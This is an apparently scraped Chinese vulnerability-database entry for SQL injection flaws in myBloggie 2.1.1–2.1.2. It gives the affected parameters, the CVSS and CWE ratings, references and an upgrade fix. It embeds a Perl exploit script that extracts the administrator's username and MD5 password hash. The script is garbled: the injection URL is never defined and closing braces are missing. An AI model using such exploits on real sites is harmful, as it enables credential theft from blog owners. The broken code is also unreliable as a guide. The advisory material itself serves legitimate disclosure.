发布时间 :2005-05-11 00:00:00
修订时间 :2016-10-17 23:20:21

[原文]Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php; or (2) the date_no parameter in viewdate mode, (3) the cat_id parameter in viewcat mode, the (4) month_no or (5) year parameter in viewmonth mode, or (6) post_id parameter in viewid mode to index.php. NOTE: item (1) was discovered to affect 2.1.3 as well.


        myBloggie 2.1.1中存在多个SQL注入漏洞,远程攻击者可以通过(1)在search.php中的keyword参数,(2)在viewdate模式中的date_no参数,(3)在viewcat模式中的cat_id参数,在viewmonth模式中的(4)month_no或(5)year参数,或(6)在viewid模式中的post_id参数,执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20050505 Multiple vulnerabilities in myBloggie 2.1.1
(UNKNOWN)  BUGTRAQ  20050527 SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
(UNKNOWN)  BID  13507
(UNKNOWN)  BID  15017
(UNKNOWN)  XF  mybloggie-sql-injection(20439)

- 漏洞信息

高危 SQL注入
2005-05-11 00:00:00 2006-06-15 00:00:00
        myBloggie 2.1.1中存在多个SQL注入漏洞,远程攻击者可以通过(1)在search.php中的keyword参数,(2)在viewdate模式中的date_no参数,(3)在viewcat模式中的cat_id参数,在viewmonth模式中的(4)month_no或(5)year参数,或(6)在viewid模式中的post_id参数,执行任意SQL命令。

- 公告与补丁


- 漏洞信息 (1023)

myBloggie 2.1.1 - 2.1.2 SQL Injection Exploit (EDBID:1023)
php webapps
2005-05-31 Verified
0 Alberto Trivero
N/A [点击下载]
#!/usr/bin/perl -w
# SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
# This exploit show the username of the administrator of the blog and his password crypted in MD5
# Related advisories: (Italian)
#                     (English)
# Patch:
# Coded by Alberto Trivero and Discovered with CorryL

use LWP::Simple;

print "\n\t=======================================\n";
print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n";
print "\t=    Alberto Trivero -    =\n";
print "\t=======================================\n\n";

if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {
   print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\n\nExample:\nperl $0 2.1.1\n";

$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
if($ARGV[1] eq '2.1.1') {
   $page=~m/<tr><td colspan="3" class="subject">(.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
   print "[-] Unable to retrieve username\n" if(!$1);
else {
   $page=~m/<img src="templates\/aura\/images\/permalink.gif" border="0" title="Permalink"><\/a> (.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
   print "[-] Unable to retrieve username\n" if(!$1);
$page=~m/<tr><td colspan="3" class="message">(.*?)<\/td><\/tr>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# [2005-05-31]

- 漏洞信息

myBloggie index.php Multiple Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

myBloggie contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the 'keyword', 'date_no', 'cat_id', 'month_no', 'year' or 'post_id' variables in the 'index.php' script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

- 时间线

2005-05-05 Unknow
2005-05-05 Unknow

- 解决方案

Upgrade to version 2.1.2 or higher, as it has been reported to fix this vulnerability. In addition, myWebland has released a patch for some older versions.

- 相关参考

- 漏洞作者